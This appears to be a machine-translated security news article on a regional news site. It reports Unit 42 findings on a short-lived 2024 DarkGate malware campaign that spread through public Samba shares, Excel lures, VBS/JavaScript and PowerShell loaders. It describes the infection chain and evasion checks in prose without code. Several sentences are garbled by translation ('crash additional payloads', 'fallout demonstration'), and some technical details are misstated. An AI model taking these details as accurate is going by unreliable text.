Close Menu
Indo Guard OnlineIndo Guard Online
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
What's Hot

Microsoft extends Windows 10 security updates on one year with new enrollment options

June 25, 2025

The new visa rule in the US requires from applicants to set privacy in social media for the public

June 24, 2025

Hackers focus on over 70 Microsoft Exchange servers to steal credentials via Keyloggers

June 24, 2025
Facebook X (Twitter) Instagram
Facebook X (Twitter) Instagram YouTube
Indo Guard OnlineIndo Guard Online
Subscribe
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
Indo Guard OnlineIndo Guard Online
Home » The DarkGate malware exploits Samba file shares in a short-lived campaign
Global Security

The DarkGate malware exploits Samba file shares in a short-lived campaign

AdminBy AdminJuly 13, 2024No Comments2 Mins Read
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


July 12, 2024Information hallMalware / cyber attacks

Cybersecurity researchers shed light on the short-lived DarkGate A malware company that used Samba file shares to initiate the infection.

Palo Alto Networks Unit 42 said the activity spanned March and April 2024, with the infection chains using servers running public Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. The targets were North America, Europe and parts of Asia.

“This was a relatively short campaign that shows how threat actors can creatively abuse legitimate tools and services to spread their malware,” security researchers Vishwa Totatri, Yidi Sui, Anmol Maura, Uday Pratap Singh and Brad Duncan said.

Cyber ​​security

DarkGate which appeared for the first time in 2018, May developed into a malware-as-a-service (MaaS) offering that is used by a tightly controlled number of customers. It comes with the capabilities to remotely control hacked nodes, execute code, mine cryptocurrency, launch shellbacks, and crash additional payloads.

Malware attacks have become particularly common in recent months following the fallout demonstration of multinational law enforcement agencies QakBot infrastructure in August 2023.

The campaign, documented by Unit 42, begins with Microsoft Excel (.xlsx) files that, when opened, prompt targets to click an embedded “Open” button, which in turn retrieves and runs VBS code located on a Samba share.

The PowerShell script is configured to receive and execute a PowerShell script, which is then used to download the AutoHotKey-based DarkGate package.

Alternative sequences using JavaScript files instead of VBS are no different in that they are also designed to load and run the following PowerShell script.

Cyber ​​security

DarkGate works by scanning various anti-malware programs and checking CPU information to determine whether it is running on a physical host or in a virtual environment, allowing it to interfere with analysis. It also checks running host processes to determine the presence of reverse engineering tools, debuggers, or virtualization software.

“DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” the researchers said.

“As DarkGate continues to evolve and refine its methods of penetration and resistance to analysis, it remains a powerful reminder of the need for robust and proactive cybersecurity protections.”

Did you find this article interesting? Follow us Twitter  and LinkedIn to read more exclusive content we publish.





Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Admin
  • Website

Related Posts

Microsoft extends Windows 10 security updates on one year with new enrollment options

June 25, 2025

The new visa rule in the US requires from applicants to set privacy in social media for the public

June 24, 2025

Hackers focus on over 70 Microsoft Exchange servers to steal credentials via Keyloggers

June 24, 2025

Researchers find a way to close Cryptominer companies using bad stocks and Xmrogue

June 24, 2025

APT28 uses signal chat to expand malicious Beardhell ​​and Testament software in Ukraine

June 24, 2025

Talk CTEM we all need

June 24, 2025
Add A Comment
Leave A Reply Cancel Reply

Loading poll ...
Coming Soon
Do You Like Our Website
: {{ tsp_total }}

Subscribe to Updates

Get the latest security news from Indoguardonline.com

Latest Posts

Microsoft extends Windows 10 security updates on one year with new enrollment options

June 25, 2025

The new visa rule in the US requires from applicants to set privacy in social media for the public

June 24, 2025

Hackers focus on over 70 Microsoft Exchange servers to steal credentials via Keyloggers

June 24, 2025

Researchers find a way to close Cryptominer companies using bad stocks and Xmrogue

June 24, 2025

APT28 uses signal chat to expand malicious Beardhell ​​and Testament software in Ukraine

June 24, 2025

Talk CTEM we all need

June 24, 2025

Hackers operate incorrectly configured API Docker to hand over cryptocurrency via Tor Network

June 24, 2025

US House forbids WhatsApp on official security and protection devices

June 24, 2025
About Us
About Us

Provide a constantly updating feed of the latest security news and developments specific to Indonesia.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

Microsoft extends Windows 10 security updates on one year with new enrollment options

June 25, 2025

The new visa rule in the US requires from applicants to set privacy in social media for the public

June 24, 2025

Hackers focus on over 70 Microsoft Exchange servers to steal credentials via Keyloggers

June 24, 2025
Most Popular

In Indonesia, crippling immigration ransomware breach sparks privacy crisis

July 6, 2024

Why Indonesia’s Data Breach Crisis Calls for Better Security

July 6, 2024

Indonesia’s plan to integrate 27,000 govt apps in one platform welcomed but data security concerns linger

July 6, 2024
© 2025 indoguardonline.com
  • Home
  • About us
  • Contact us
  • Privacy Policy

Type above and press Enter to search. Press Esc to cancel.